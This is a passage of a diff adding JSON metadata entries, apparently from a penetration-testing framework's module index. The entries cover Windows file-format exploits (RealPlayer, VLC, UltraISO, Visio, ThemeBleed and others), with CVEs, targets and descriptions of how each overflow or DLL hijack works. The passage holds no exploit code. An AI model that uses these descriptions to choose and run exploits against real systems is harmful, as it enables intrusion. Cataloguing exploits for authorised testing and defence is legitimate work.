"/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/real_networks_netzip_bof", + "check": false, + "post_auth": false, + "default_credential": 
false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/real_player_url_property_bof": { + "name": "RealPlayer RealMedia File Handling Buffer Overflow", + "fullname": "exploit/windows/fileformat/real_player_url_property_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-12-14", + "type": "exploit", + "author": [ + "suto " + ], + "description": "This module exploits a stack based buffer overflow on RealPlayer <=15.0.6.14.\n The vulnerability exists in the handling of real media files, due to the insecure\n usage of the GetPrivateProfileString function to retrieve the URL property from an\n InternetShortcut section.\n\n This module generates a malicious rm file which must be opened with RealPlayer via\n drag and drop or double click methods. It has been tested successfully on Windows\n XP SP3 with RealPlayer 15.0.5.109.", + "references": [ + "CVE-2012-5691", + "OSVDB-88486", + "BID-56956", + "URL-http://service.real.com/realplayer/security/12142012_player/en/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 / Real Player 15.0.5.109" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/real_player_url_property_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/real_player_url_property_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/realplayer_ver_attribute_bof": { + "name": "RealNetworks RealPlayer Version Attribute Buffer Overflow", + "fullname": "exploit/windows/fileformat/realplayer_ver_attribute_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-12-20", + "type": "exploit", + "author": [ + "Gabor Seljan" + ], + "description": "This module exploits a stack-based buffer overflow vulnerability in\n 
version 16.0.3.51 and 16.0.2.32 of RealNetworks RealPlayer, caused by\n improper bounds checking of the version and encoding attributes inside\n the XML declaration.\n\n By persuading the victim to open a specially-crafted .RMP file, a\n remote attacker could execute arbitrary code on the system or cause\n the application to crash.", + "references": [ + "BID-64695", + "EDB-30468", + "OSVDB-101356", + "CVE-2013-7260", + "US-CERT-VU-698278", + "URL-http://service.real.com/realplayer/security/12202013_player/en/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP2/SP3 (DEP Bypass) / RealPlayer 16.0.3.51/16.0.2.32" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/realplayer_ver_attribute_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/safenet_softremote_groupname": { + "name": "SafeNet SoftRemote GROUPNAME Buffer Overflow", + "fullname": "exploit/windows/fileformat/safenet_softremote_groupname", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-10-30", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in SafeNet SoftRemote\n Security Policy Editor <= 10.8.5. 
When an attacker\n creates a specially formatted security policy with an\n overly long GROUPNAME argument, it is possible to execute\n arbitrary code.", + "references": [ + "CVE-2009-3861", + "OSVDB-59660", + "URL-http://www.senseofsecurity.com.au/advisories/SOS-09-008" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 English", + "WinSrv 2000 SP4 English", + "WinSrv 2000 SP2 English", + "WinSrv 2003 Enterprise Edition SP1 (v1023) English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/safenet_softremote_groupname", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/sascam_get": { + "name": "SasCam Webcam Server v.2.6.5 Get() Method Buffer Overflow", + "fullname": "exploit/windows/fileformat/sascam_get", + "aliases": [], + "rank": 100, + "disclosure_date": "2008-12-29", + "type": "exploit", + "author": [ + "dean " + ], + "description": "The SasCam Webcam Server ActiveX control is vulnerable to a buffer overflow.\n By passing an overly long argument via the Get method, a remote attacker could\n overflow a buffer and execute arbitrary code on the system with the privileges\n of the user. 
This control is not marked safe for scripting, please choose your\n attack vector carefully.", + "references": [ + "CVE-2008-6898", + "OSVDB-55945", + "BID-33053" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/sascam_get.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/sascam_get", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/scadaphone_zip": { + "name": "ScadaTEC ScadaPhone Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/scadaphone_zip", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-09-12", + "type": "exploit", + "author": [ + "mr_me " + ], + "description": "This module exploits a stack-based buffer overflow vulnerability in\n version 5.3.11.1230 of scadaTEC's ScadaPhone.\n\n In order for the command to be executed, an attacker must convince someone to\n load a specially crafted project zip file with ScadaPhone.\n By doing so, an attacker can execute arbitrary code as the victim user.", + "references": [ + "CVE-2011-4535", + "OSVDB-75375", + "URL-http://www.scadatec.com/", + "EDB-17817" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/scadaphone_zip.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/scadaphone_zip", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/shadow_stream_recorder_bof": { + "name": "Shadow Stream Recorder 3.0.1.7 Buffer Overflow", + 
"fullname": "exploit/windows/fileformat/shadow_stream_recorder_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-03-29", + "type": "exploit", + "author": [ + "AlpHaNiX ", + "b0telh0 " + ], + "description": "This module exploits a buffer overflow in Shadow Stream Recorder 3.0.1.7.\n Using the application to open a specially crafted asx file, a buffer\n overflow may occur to allow arbitrary code execution under the context\n of the user.", + "references": [ + "CVE-2009-1641", + "OSVDB-81487", + "EDB-11957", + "BID-34864" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/shadow_stream_recorder_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/shaper_pdf_bof": { + "name": "PDF Shaper Buffer Overflow", + "fullname": "exploit/windows/fileformat/shaper_pdf_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-10-03", + "type": "exploit", + "author": [ + "metacom27 ", + "metacom" + ], + "description": "PDF Shaper is prone to a security vulnerability when processing PDF files.\n The vulnerability appears when we use Convert PDF to Image and use a specially\n crafted PDF file. 
This module has been tested successfully on Win XP, Win 7,\n Win 8, Win 10.", + "references": [ + "EDB-37760" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/shaper_pdf_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/shaper_pdf_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/somplplayer_m3u": { + "name": "S.O.M.P.L 1.0 Player Buffer Overflow", + "fullname": "exploit/windows/fileformat/somplplayer_m3u", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-01-22", + "type": "exploit", + "author": [ + "Rick2600", + "dookie" + ], + "description": "This module exploits a buffer overflow in Simple Open Music Player v1.0. When\n the application is used to import a specially crafted m3u file, a buffer overflow occurs\n allowing arbitrary code execution.", + "references": [ + "OSVDB-64368", + "EDB-11219" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/somplplayer_m3u.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/somplplayer_m3u", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/subtitle_processor_m3u_bof": { + "name": "Subtitle Processor 7.7.1 .M3U SEH Unicode Buffer Overflow", + "fullname": "exploit/windows/fileformat/subtitle_processor_m3u_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-04-26", + "type": "exploit", + "author": [ + "Brandon Murphy", + "sinn3r " + ], + "description": 
"This module exploits a vulnerability found in Subtitle Processor 7. By\n supplying a long string of data as a .m3u file, Subtitle Processor first converts\n this input in Unicode, which expands the string size, and then attempts to copy it\n inline on the stack. This results a buffer overflow with SEH overwritten, allowing\n arbitrary code execution.", + "references": [ + "OSVDB-72050", + "EDB-17217", + "URL-http://sourceforge.net/projects/subtitleproc/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/subtitle_processor_m3u_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/syncbreeze_xml": { + "name": "Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow", + "fullname": "exploit/windows/fileformat/syncbreeze_xml", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-03-29", + "type": "exploit", + "author": [ + "Daniel Teixeira" + ], + "description": "This module exploits a buffer overflow in Sync Breeze Enterprise 9.5.16\n by using the import command option to import a specially crafted xml file.", + "references": [ + "CVE-2017-7310", + "EDB-41773" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/syncbreeze_xml.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/syncbreeze_xml", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + 
"exploit_windows/fileformat/tfm_mmplayer_m3u_ppl_bof": { + "name": "TFM MMPlayer (m3u/ppl File) Buffer Overflow", + "fullname": "exploit/windows/fileformat/tfm_mmplayer_m3u_ppl_bof", + "aliases": [], + "rank": 400, + "disclosure_date": "2012-03-23", + "type": "exploit", + "author": [ + "RjRjh Hack3r", + "bcoles " + ], + "description": "This module exploits a buffer overflow in MMPlayer 2.2\n The vulnerability is triggered when opening a malformed M3U/PPL file\n that contains an overly long string, which results in overwriting a\n SEH record, thus allowing arbitrary code execution under the context\n of the user.", + "references": [ + "CVE-2009-2566", + "OSVDB-80532", + "BID-52698", + "EDB-18656", + "EDB-18657" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/tfm_mmplayer_m3u_ppl_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/theme_dll_hijack_cve_2023_38146": { + "name": "Themebleed- Windows 11 Themes Arbitrary Code Execution CVE-2023-38146", + "fullname": "exploit/windows/fileformat/theme_dll_hijack_cve_2023_38146", + "aliases": [], + "rank": 600, + "disclosure_date": "2023-09-13", + "type": "exploit", + "author": [ + "gabe_k", + "bwatters-r7", + "Spencer McIntyre" + ], + "description": "When an unpatched Windows 11 host loads a theme file referencing an msstyles file, Windows loads the\n msstyles file, and if that file's PACKME_VERSION is `999`, it then attempts to load an accompanying dll\n file ending in `_vrf.dll` Before loading that file, it verifies that the file is signed. 
It does this by\n opening the file for reading and verifying the signature before opening the file for execution.\n Because this action is performed in two discrete operations, it opens the procedure for a time of check to\n time of use vulnerability. By embedding a UNC file path to an SMB server we control, the SMB server can\n serve a legitimate, signed dll when queried for the read, but then serve a different file of the same name\n when the host intends to load/execute the dll.", + "references": [ + "CVE-2023-38146", + "URL-https://exploits.forsale/themebleed/", + "URL-https://github.com/gabe-k/themebleed/tree/main" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2024-01-04 11:11:23 +0000", + "path": "/modules/exploits/windows/fileformat/theme_dll_hijack_cve_2023_38146.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/theme_dll_hijack_cve_2023_38146", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk", + "screen-effects" + ], + "AKA": [ + "ThemeBleed" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/total_video_player_ini_bof": { + "name": "Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow", + "fullname": "exploit/windows/fileformat/total_video_player_ini_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-11-24", + "type": "exploit", + "author": [ + "Mike Czumak", + "Fr330wn4g3 " + ], + "description": "This module exploits a buffer overflow in Total Video Player 1.3.1. The vulnerability\n occurs opening malformed Settings.ini file e.g. 
\"C:\\Program Files\\Total Video Player\\\".\n This module has been tested successfully on Windows WinXp-Sp3-EN, Windows 7, and Windows 8.", + "references": [ + "OSVDB-100619", + "EDB-29799" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/total_video_player_ini_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/tugzip": { + "name": "TugZip 3.5 Zip File Parsing Buffer Overflow Vulnerability", + "fullname": "exploit/windows/fileformat/tugzip", + "aliases": [], + "rank": 400, + "disclosure_date": "2008-10-28", + "type": "exploit", + "author": [ + "Stefan Marin", + "Lincoln", + "TecR0c ", + "mr_me " + ], + "description": "This module exploits a stack-based buffer overflow vulnerability\n in the latest version 3.5 of TugZip archiving utility.\n In order to trigger the vulnerability, an attacker must convince someone\n to load a specially crafted zip file with TugZip by double click or file open.\n By doing so, an attacker can execute arbitrary code as the victim user.", + "references": [ + "OSVDB-49371", + "CVE-2008-4779", + "BID-31913", + "EDB-12008" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/tugzip.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/tugzip", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ultraiso_ccd": { + 
"name": "UltraISO CCD File Parsing Buffer Overflow", + "fullname": "exploit/windows/fileformat/ultraiso_ccd", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-04-03", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow in EZB Systems, Inc's\n UltraISO. When processing .CCD files, data is read from file into a\n fixed-size stack buffer. Since no bounds checking is done, a buffer overflow\n can occur. Attackers can execute arbitrary code by convincing their victim\n to open an CCD file.\n\n NOTE: A file with the same base name, but the extension of \"img\" must also\n exist. Opening either file will trigger the vulnerability, but the files must\n both exist.", + "references": [ + "CVE-2009-1260", + "OSVDB-53275", + "BID-34363", + "BID-38613", + "EDB-8343" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal - Double-Click/Command Line Open Method", + "Windows Universal - File->Open + Toolbar Open Methods" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ultraiso_ccd.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ultraiso_ccd", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ultraiso_cue": { + "name": "UltraISO CUE File Parsing Buffer Overflow", + "fullname": "exploit/windows/fileformat/ultraiso_cue", + "aliases": [], + "rank": 500, + "disclosure_date": "2007-05-24", + "type": "exploit", + "author": [ + "n00b", + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow in EZB Systems, Inc's\n UltraISO. When processing .CUE files, data is read from file into a\n fixed-size stack buffer. Since no bounds checking is done, a buffer overflow\n can occur. 
Attackers can execute arbitrary code by convincing their victim\n to open an CUE file.\n\n NOTE: A file with the same base name, but the extension of \"bin\" must also\n exist. Opening either file will trigger the vulnerability, but the files must\n both exist.", + "references": [ + "CVE-2007-2888", + "OSVDB-36570", + "BID-24140", + "EDB-3978" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows - UltraISO v8.6.2.2011 portable", + "Windows - UltraISO v8.6.0.1936" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ultraiso_cue.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ultraiso_cue", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ursoft_w32dasm": { + "name": "URSoft W32Dasm Disassembler Function Buffer Overflow", + "fullname": "exploit/windows/fileformat/ursoft_w32dasm", + "aliases": [], + "rank": 400, + "disclosure_date": "2005-01-24", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a buffer overflow in W32Dasm <= v8.93.\n By creating a malicious file and convincing a user to disassemble\n the file with a vulnerable version of W32Dasm, the Imports/Exports\n function is copied to the stack and arbitrary code may be executed\n locally as the user.", + "references": [ + "CVE-2005-0308", + "OSVDB-13169", + "BID-12352", + "URL-http://aluigi.altervista.org/adv/w32dasmbof-adv.txt" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ursoft_w32dasm.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ursoft_w32dasm", + "check": false, + "post_auth": 
false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/varicad_dwb": { + "name": "VariCAD 2010-2.05 EN (DWB File) Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/varicad_dwb", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-03-17", + "type": "exploit", + "author": [ + "n00b", + "dookie", + "MC ", + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow in VariCAD 2010-2.05 EN.\n An attacker must send the file to victim and the victim must open the file.", + "references": [ + "OSVDB-63067", + "BID-38815", + "EDB-11789" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/varicad_dwb.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/varicad_dwb", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/videocharge_studio": { + "name": "VideoCharge Studio Buffer Overflow (SEH)", + "fullname": "exploit/windows/fileformat/videocharge_studio", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-10-27", + "type": "exploit", + "author": [ + "metacom", + "Andrew Smith", + "Christian Mehlmauer " + ], + "description": "This module exploits a stack based buffer overflow in VideoCharge Studio 2.12.3.685 when\n processing a specially crafted .VSC file. 
This vulnerability could be\n exploited by a remote attacker to execute arbitrary code on the target\n machine by enticing a user of VideoCharge Studio to open a malicious .VSC file.", + "references": [ + "OSVDB-69616", + "EDB-29234" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "VideoCharge Studio 2.12.3.685" + ], + "mod_time": "2023-04-04 09:48:51 +0000", + "path": "/modules/exploits/windows/fileformat/videocharge_studio.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/videocharge_studio", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [], + "SideEffects": [], + "Reliability": [], + "NOCVE": [ + "Reason not given" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/videolan_tivo": { + "name": "VideoLAN VLC TiVo Buffer Overflow", + "fullname": "exploit/windows/fileformat/videolan_tivo", + "aliases": [], + "rank": 400, + "disclosure_date": "2008-10-22", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in VideoLAN VLC 0.9.4.\n By creating a malicious TY file, a remote attacker could overflow a\n buffer and execute arbitrary code.", + "references": [ + "CVE-2008-4654", + "OSVDB-49181", + "BID-31813" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "VideoLAN VLC 0.9.4 (XP SP3 English)", + "VideoLAN VLC 0.9.2 (XP SP3 English)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/videolan_tivo.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/videolan_tivo", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/videospirit_visprj": { + "name": "VeryTools Video 
Spirit Pro", + "fullname": "exploit/windows/fileformat/videospirit_visprj", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-04-11", + "type": "exploit", + "author": [ + "Acidgen", + "corelanc0d3r " + ], + "description": "This module exploits a stack buffer overflow in Video Spirit <= 1.70.\n When opening a malicious project file (.visprj), a stack buffer overflow occurs,\n resulting in arbitrary code execution.\n This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.", + "references": [ + "CVE-2011-0499", + "CVE-2011-0500", + "OSVDB-70619", + "URL-http://www.corelan.be/advisories.php?id=CORELAN-11-001" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP/Vista/Win7/... Generic DEP & ASLR Bypass" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/videospirit_visprj.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/videospirit_visprj", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/visio_dxf_bof": { + "name": "Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability", + "fullname": "exploit/windows/fileformat/visio_dxf_bof", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-05-04", + "type": "exploit", + "author": [ + "Unknown", + "Shahin Ramezany ", + "juan vazquez " + ], + "description": "This module exploits a stack based overflow vulnerability in the handling\n of the DXF files by Microsoft Visio 2002. Revisions prior to the release of\n the MS bulletin MS10-028 are vulnerable. 
The overflow occurs when the application\n is used to import a specially crafted DXF file, while parsing the HEADER section\n of the DXF file.\n\n To trigger the vulnerability an attacker must convince someone to insert a\n specially crafted DXF file to a new document, go to 'Insert' -> 'CAD Drawing'", + "references": [ + "CVE-2010-1681", + "OSVDB-64446", + "BID-39836", + "URL-http://www.coresecurity.com/content/ms-visio-dxf-buffer-overflow", + "URL-http://web.archive.org/web/20101113032001/http://www.exploit-db.com:80/moaub-8-microsoft-office-visio-dxf-file-stack-overflow/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Visio 2002 English on Windows XP SP3 Spanish", + "Visio 2002 English on Windows XP SP3 English" + ], + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/exploits/windows/fileformat/visio_dxf_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/visio_dxf_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/visiwave_vwr_type": { + "name": "VisiWave VWR File Parsing Vulnerability", + "fullname": "exploit/windows/fileformat/visiwave_vwr_type", + "aliases": [], + "rank": 500, + "disclosure_date": "2011-05-20", + "type": "exploit", + "author": [ + "mr_me ", + "TecR0c " + ], + "description": "This module exploits a vulnerability found in VisiWave's Site Survey Report application.\n When processing .VWR files, VisiWaveReport.exe attempts to match a valid pointer based on the 'Type'\n property (valid ones include 'Properties', 'TitlePage', 'Details', 'Graph', 'Table', 'Text',\n 'Image'), but if a match isn't found, the function that's supposed to handle this routine\n ends up returning the input as a pointer, and later used in a CALL DWORD PTR [EDX+10]\n instruction. 
This allows attackers to overwrite it with any arbitrary value, and results code\n execution. A patch is available at visiwave.com; the fix is done by XORing the return value as\n null if no match is found, and then it is validated before use.\n\n NOTE: During installation, the application will register two file handles, VWS and VWR, which allows a\n victim user to 'double click' the malicious VWR file and execute code. This module was also built\n to bypass ASLR and DEP.", + "references": [ + "CVE-2011-2386", + "OSVDB-72464", + "URL-http://www.visiwave.com/blog/index.php?/archives/4-Version-2.1.9-Released.html", + "URL-http://www.stratsec.net/Research/Advisories/VisiWave-Site-Survey-Report-Trusted-Pointer-%28SS-20" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3/Windows 7 SP0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/visiwave_vwr_type.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/visiwave_vwr_type", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/vlc_mkv": { + "name": "VLC Media Player MKV Use After Free", + "fullname": "exploit/windows/fileformat/vlc_mkv", + "aliases": [], + "rank": 500, + "disclosure_date": "2018-05-24", + "type": "exploit", + "author": [ + "Eugene Ng - GovTech", + "Winston Ho - GovTech" + ], + "description": "This module exploits a use after free vulnerability in\n VideoLAN VLC =< 2.2.8. 
The vulnerability exists in the parsing of\n MKV files and affects both 32 bits and 64 bits.\n\n In order to exploit this, this module will generate two files:\n The first .mkv file contains the main vulnerability and heap spray,\n the second .mkv file is required in order to take the vulnerable code\n path and should be placed under the same directory as the .mkv file.\n\n This module has been tested against VLC v2.2.8. Tested with payloads\n windows/exec, windows/x64/exec, windows/shell/reverse_tcp,\n windows/x64/shell/reverse_tcp. Meterpreter payloads if used can\n cause the application to crash instead.", + "references": [ + "CVE-2018-11529", + "EDB-44979" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "VLC 2.2.8 on Windows 10 x86", + "VLC 2.2.8 on Windows 10 x64" + ], + "mod_time": "2023-07-14 12:46:26 +0000", + "path": "/modules/exploits/windows/fileformat/vlc_mkv.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/vlc_mkv", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/vlc_modplug_s3m": { + "name": "VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/vlc_modplug_s3m", + "aliases": [], + "rank": 200, + "disclosure_date": "2011-04-07", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits an input validation error in libmod_plugin as\n included with VideoLAN VLC 1.1.8. All versions prior to version 1.1.9\n are affected. By creating a malicious S3M file, a remote attacker\n could execute arbitrary code.\n\n Although other products that bundle libmodplug may be vulnerable, this\n module was only tested against VLC.\n\n NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to\n permanently enable NX support on machines that support it. 
